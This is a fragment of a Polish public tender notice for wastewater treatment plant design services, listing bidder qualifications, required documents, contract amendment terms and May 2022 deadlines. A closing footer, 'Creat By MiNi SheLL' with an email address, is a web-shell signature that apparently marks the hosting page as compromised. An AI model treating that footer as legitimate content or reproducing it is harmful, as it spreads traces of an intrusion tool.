Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym oraz uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający opisuje warunku udziału.<br/>2) Zdolność techniczna lub zawodowa<br/>a) Wiedza i doświadczenie.<br/>Wykonawca spełni warunek, jeżeli wykaże, że wykonał w terminie ostatnich 5 lat przed upływem terminu składania ofert a<br/>jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej 1 usługę projektową dot.<br/>budowy/przebudowy/modernizacji oczyszczalni ścieków komunalnych. Warunek zostanie spełniony, jeżeli wykonawca<br/>wykaże się wykonaniem co najmniej 1 usługi polegającej na wykonaniu dokumentacji projektowej dot.<br/>budowy/przebudowy/modernizacji oczyszczalni ścieków komunalnych o obciążeniu oczyszczalni wyrażoną liczbą min. 3000<br/>RLM lub 450 m3/d.<br/>Warunek ten ma spełniać samodzielnie Wykonawca lub samodzielnie jeden z konsorcjantów lub samodzielnie jeden<br/>podmiot udostępniający zasoby wiedzy i doświadczenia.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy.<br/>Na wezwanie zamawiającego (art. 274 ust. 1), po terminie składania ofert wykonawca, którego oferta zostanie oceniona<br/>zostanie wezwany do złożenia wykazu potwierdzającego spełnienie tego warunku udziału w postępowaniu – wg Załącznika<br/>nr 6 SWZ.<br/>2) Zdolność techniczna lub zawodowa – cd.<br/>b) Warunek dysponowania osobami – minimalny zakres kwalifikacji i doświadczenia wymagany od osób skierowanych do<br/>realizacji zamówienia.<br/>Wykonawca musi wykazać osoby, które zostaną skierowane do realizacji zamówienia posiadające kwalifikacje zawodowe,<br/>uprawnienia, doświadczenie i wykształcenie niezbędne do wykonania zamówienia oraz Wykonawca musi wykazać że<br/>będzie dysponował osobami podając podstawę do dysponowania tymi osobami. Zamawiający uzna warunek za spełniony,<br/>jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować osobami zdolnymi do wykonywania zamówienia:<br/>- Kierownik projektu – główny projektant - minimum 1 osoba na stanowisku kierownika projektu oraz 1 osoba sprawdzająca,<br/>posiadające uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy<br/>z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019 r.<br/>poz. 1117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst<br/>jednolity Dz. U. z 2021 poz. 2351 z późn. zm.), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na<br/>zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia<br/>15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług<br/>transgranicznych”)<br/>- Projektant branży konstrukcyjno- budowlanej - minimum 1 osoba na stanowisku projektanta oraz 1 osoba sprawdzająca,<br/>posiadające uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno- budowlanej lub<br/>odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz<br/>zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach<br/>zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019 r. poz. 1117) lub spełniającą warunki,<br/>o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2021 poz. 2351 z późn.<br/>zm.), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach<br/>odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych<br/>architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”)<br/>- Projektant branży architektonicznej - minimum 1 osoba na stanowisku projektanta oraz 1 osoba sprawdzająca,<br/>posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej lub odpowiadające<br/>im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we<br/>właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych<br/>architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019 r. poz. 1117) lub spełniającą warunki, o których<br/>mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2021 poz. 2351 z późn. zm.), tj.<br/>osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub<br/>spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa („świadczenie usług transgranicznych”)<br/>Projektant branży elektrycznej i AKPiA - minimum 1 osoba na stanowisku projektanta oraz 1 osoba sprawdzająca,<br/>posiadająca uprawnienia budowlane do projektowania bez ograniczeń w zakresie instalacji elektrycznych i urządzeń<br/>elektroenergetycznych, automatyki kontrolno-pomiarowej lub odpowiadające im ważne uprawnienia, które zostały wydane<br/>na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z<br/>przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst<br/>jednolity: Dz. U. z 2019 r. poz. 1117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane (tekst jednolity Dz. U. z 2021 poz. 2351 z późn. zm.), tj. osobą, której odpowiednie kwalifikacje zawodowe<br/>zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a<br/>ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług<br/>transgranicznych”)<br/>Na wezwanie zamawiającego (art. 274 ust. 1), po terminie składania ofert wykonawca, którego oferta zostanie oceniona<br/>zostanie wezwany do złożenia wykazu potwierdzającego spełnienie tego warunku udziału w postępowaniu – wg Załącznika<br/>nr 7 SWZ.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek ten musi spełnić co najmniej jeden z wykonawców składających ofertę wspólną. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>2) Zdolność techniczna lub zawodowa – cd.<br/>c) Wykonawca musi dysponować przez cały okres realizacji zamówienia następującym potencjałem<br/>technicznym:<br/>Zamawiający nie dokonuje określenia sposobu spełniania warunku.<br/>3) Sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie dokonuje określenia sposobu spełniania warunku.<br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów i oświadczeń złożonych<br/>przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.<br/>Pozostałe ustalenia dot. warunków udziału w postępowaniu zawarte są w rozdziale V SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W trakcie procedury badania<br/>i oceny ofert na podstawie art. 274 ust 1 ustawy pzp Wykonawca, którego oferta zostanie najwyżej oceniona (oceniona, jako<br/>najkorzystniejsza), zostanie wezwany przez Zamawiającego w wyznaczonym terminie nie krótszym niż 5 dni terminie do<br/>przedłożenia następujących oświadczeń i dokumentów (aktualnych na dzień złożenia oświadczeń lub dokumentów):<br/>2.1. W zakresie nie podlegania wykluczeniu z udziału w postępowaniu:<br/>1) Aktualizującego oświadczenia o braku podstaw wykluczenia z postępowania na podstawie art. 108 ust. 1 pkt 5 ustawy pzp – wg<br/>Załącznika nr 8 SWZ.<br/>2) Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat – także dokumentów potwierdzających, że przed upływem terminu składania ofert<br/>Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w<br/>sprawie spłat tych należności;<br/>3) Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109<br/>ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem – także dokumentów<br/>potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>W przypadku złożenia oferty wspólnej dokumenty z podpunktów 1-4 składa każdy z wykonawców, którzy złożyli ofertę wspólną.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W<br/>trakcie procedury badania i oceny ofert na podstawie art. 274 ust 1 ustawy pzp Wykonawca, którego oferta zostanie najwyżej<br/>oceniona (oceniona, jako najkorzystniejsza), zostanie wezwany przez Zamawiającego w wyznaczonym terminie nie krótszym niż 5<br/>dni terminie do przedłożenia następujących oświadczeń i dokumentów (aktualnych na dzień złożenia oświadczeń lub dokumentów):<br/>2.2. W zakresie spełnienia warunków udziału w postępowaniu:<br/>1) Wykazu wykonanych robót budowlanych oraz dokumentu potwierdzającego należytą realizację – na potwierdzenie spełnienia<br/>warunku udziału wskazanego w SWZ:<br/>Załącznik nr 6 SWZ (wykaz wykonanych robót budowlanych - doświadczenie).<br/>2) Wykazu osób które będą uczestniczyć w realizacji zamówienia – na potwierdzenie spełnienia warunku udziału wskazanego w<br/>SWZ:<br/>Załącznik nr 7 SWZ (wykaz osób, kwalifikacje).<br/>Na wezwanie zamawiającego (art. 274 ust. 1), po terminie składania ofert wykonawca, którego oferta zostanie oceniona zostanie<br/>wezwany do złożenia wykazu potwierdzającego spełnienie tego warunku udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz oświadczeń w celu wstępnego potwierdzenia, że wykonawca nie podlega wykluczeniu oraz spełnia<br/>warunki udziału w postępowaniu (rozdział V ust. 1 niniejszej SWZ) – SKŁADANE DO OFERTY:<br/>1) aktualne na dzień składania ofert oświadczenie stanowiące wstępne potwierdzenie, że Wykonawca niepodlega wykluczeniu oraz spełnia warunki udziału w postępowaniu zgodne z załączonymi wzorami.<br/>Załącznik nr 3 SWZ<br/>Załącznik nr 4 SWZ<br/>2) zobowiązanie podmiotu trzeciego, o którym mowa w art. 118 ust 3 i ust. 4 ustawy pzp – jeżeli Wykonawca polega<br/>nazasobach lub sytuacji podmiotu trzeciego.<br/>Załącznik nr 5 SWZ<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie braku podstaw<br/>wykluczenia (Załącznik nr 3) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. W zakresie spełnienia<br/>warunków udziału w postępowaniu oświadczenie składa ten wykonawca, który spełnia warunek lub łącznie razem.<br/>4) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5) Pełnomocnictwo lub inny dokument, z którego wynika umocowanie do składania oświadczeń w imieniu wykonawcy,<br/>podmiotu udostępniającego zasoby czy złożeniu oferty wspólnej.<br/>W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający<br/>żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa<br/>powyżej, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca<br/>wskazał dane umożliwiające dostęp do tych dokumentów (formularz oferty Załącznik nr 1 SWZ). Jeżeli w imieniu wykonawcy<br/>działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa powyżej,<br/>zamawiający może żądać od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania wykonawcy. Powyższestosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia publicznego oraz odpowiednio do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy lub podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby na takich zasadach.<br/>6) Wycenioną tabelę elementów rozliczeniowych, o treści zgodnej z załączonym wzorem – wg Załącznika nr 2 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień Umowy<br/>1. Zamawiający działając zgodnie z przepisami art. 455 ustawy Pzp, przewiduje w ogłoszeniu o zamówieniu lub<br/>dokumentach zamówienia możliwość zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia.<br/>2. Zmiany w umowie mogą dotyczyć:<br/>1) zmiany terminu wykonania zamówienia,<br/>2) zmiany na polecenie Zamawiającego,<br/>3) zmiany w zakresie personelu Wykonawcy, na zasadach szczegółowo opisanych w § 7 Umowy,<br/>4) zmiana w zakresie podwykonawstwa, szczegółowo opisana w § 8 Umowy,<br/>Uszczegółowienie zapisów dotyczących zakresu zmian w umowie są zawarte w paragrafie 10 załącznika nr 11 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-20 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-20 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com